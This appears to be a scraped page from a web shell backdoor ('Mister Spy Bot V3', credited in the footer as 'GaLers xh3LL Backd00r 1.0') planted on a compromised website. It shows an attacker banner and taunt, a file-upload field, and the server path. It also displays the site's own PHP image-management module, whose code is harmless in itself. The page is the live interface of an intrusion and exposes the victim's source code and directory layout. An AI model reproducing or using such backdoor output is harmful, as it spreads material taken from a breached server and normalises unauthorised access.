Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/espanol/modules/
Upload File :
Current File : /home/caballoscriollos/www/espanol/modules/loteimagenes.php

<?

require_once('../library/class.loteimagenes.php');

class ModuleLoteImagenes extends Module
{
	function GetName()
	{
		return "LoteImagenes";
	}


	function GetXMLCommands()
	{
		$Commands = array();

		$Commands[] = 'GetById';
		$Commands[] = 'GetLastId';
		$Commands[] = 'GetAll';
		$Commands[] = 'Create';
		$Commands[] = 'Update';
		$Commands[] = 'Delete';

		return $Commands;
	}

	
	function GetById(array $array)
	{
		$LoteImagenes = new LoteImagenes();

		return $LoteImagenes->GetById($array['IdImagen']);
	}


	function GetLastId(array $array)
	{
		$LoteImagenes = new LoteImagenes();

		return $LoteImagenes->GetLastId();
	}

	
	function GetAll(array $array)
	{
		$LoteImagenes 		= new LoteImagenes();
		$oPage 				= new Page($array['CurrentPage']);
		
		$filter = array();		
		$filter['Nombre'] = $array['Filter_Nombre'];
		
		return $LoteImagenes->GetAll($filter, $oPage);
	}


	function Create(array $array)
	{
		$LoteImagenes 	= new LoteImagenes();
		$oLoteImagen 	= new LoteImagen();

		$oLoteImagen->IdLote 		= $array['IdLote'];
		$oLoteImagen->Imagen 		= $array['Imagen'];
		$oLoteImagen->NumeroOrden	= $array['NumeroOrden'];
		$oLoteImagen->Epigrafe 		= $array['Epigrafe'];
			
		$oLoteImagen = $LoteImagenes->Create($oLoteImagen);
		if (!$oLoteImagen)
			return false;
		
		return $oLoteImagen;
	}


	function Update(array $array)
	{
		$LoteImagenes = new LoteImagenes();

		/* obtiene los datos del registro */
		$oLoteImagen = $LoteImagenes->GetById($array['IdImagen']);
		if (!$oLoteImagen)
			return false;
		
		$oLoteImagen->NumeroOrden	= $array['NumeroOrden'];
		$oLoteImagen->Epigrafe 		= $array['Epigrafe'];
		
		return $LoteImagenes->Update($oLoteImagen);
	}


	function Delete(array $array)
	{
		$LoteImagenes = new LoteImagenes();

		/* obtiene los datos del registro */
		$oLoteImagen = $LoteImagenes->GetById($array['IdImagen']);
		if (!$oLoteImagen)
			return false;
		
		return $LoteImagenes->Delete($oLoteImagen->IdImagen);
	}
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat